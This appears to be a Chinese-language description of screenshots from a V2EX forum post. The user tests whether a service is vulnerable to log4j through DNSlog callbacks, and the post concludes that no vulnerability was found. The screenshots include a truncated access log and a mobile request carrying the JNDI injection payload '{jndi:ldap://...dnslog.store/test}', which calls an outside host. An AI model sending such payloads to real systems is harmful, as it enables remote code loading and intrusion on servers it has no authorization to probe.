DNSlog复现成功但未检测到log4j漏洞的测试记录
DNSlog 复现成功, 但似乎没有 log4j漏洞
文本内容
几秒后原图中的地址收到了 120.233.19.186(广东移动)的访问,URL 是图中部分可见文字的拼接
{"time":1700801419.550,"host":"XXX:443","req":"GET /YYY/snapshotsMethodPOSTHeadersAuthorizati...Bearer","req_si (Linux; Android 13; M2007J1SC Build/TKQ1.221114.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/107.0.5304.141 Mobile Safari/537.36 XWEB/5127 MMWEBSDK/20230405 MMWEBID/1151 MicroMessenger/8.0.35.2360(0x2800235D) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64 qcloudcdn-xinan Request-Source=3 Request-Channel=99","status":404,"resp_time":0.000,"resp_size":1482,
第1条附言 · 16小时2分钟前
DNSlog 复现成功, 但似乎没有 log4j漏洞
Get contents of https://358c20ea.dnslog.store/test$
{jndi:ldap://ccb736b1.dnslog.store/test}
Method: GET
Headers:
tencent: tai qiang da la!!!
整体描述
这是一张多图拼接的网络安全测试记录截图,上方是V2EX论坛的帖子内容,展示了一次来自广东移动IP的网络访问请求日志,请求返回404状态;帖子附言说明DNSlog复现成功,但未检测到log4j漏洞。下方是手机端自动化工具(类似快捷指令)的操作截图,显示正在发起包含jndi:ldap格式的请求以检测log4j漏洞,请求头还添加了调侃腾讯的内容。整体是网络安全领域的漏洞测试过程分享,无谐音梗或双关内容。
来源说明
图片内容来自V2EX论坛的用户原创帖子,帖子由用户分享自身的log4j漏洞测试过程,下方是手机端工具的操作截图,首发平台为v2ex.com,属于用户自制的技术测试记录内容。